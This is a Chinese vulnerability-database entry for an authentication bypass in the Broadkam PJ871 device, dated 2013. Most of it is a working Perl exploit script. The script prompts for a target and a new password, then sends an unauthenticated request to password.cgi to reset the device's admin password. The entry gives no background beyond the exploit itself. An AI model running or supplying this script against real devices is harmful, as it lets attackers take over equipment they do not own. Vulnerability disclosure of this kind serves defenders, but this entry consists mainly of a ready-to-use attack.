Broadkam PJ871 Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044718 漏洞类型
发布时间 2013-07-26 更新时间 2013-07-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013070204
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
#d3c0der


use HTTP::Request;
use LWP::UserAgent;

 

print "= Target : ";
$ip=<STDIN>;
chomp $ip;
print "= new password : ";
$npass=<STDIN>;
chomp $npass;

if ( $ip !~ /^http:/ ) {
$ip = 'http://' . $ip;
}
if ( $ip !~ /\/$/ ) {
$ip = $ip . '/';
}
print "\n";

print "->attacking , plz wait ! : $ip\n";
 

 

@path1=("password.cgi?sysPassword=$npass");

foreach $ways(@path1){

$final=$ip.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

 
}
 
print "[-] password changed to $npass \n";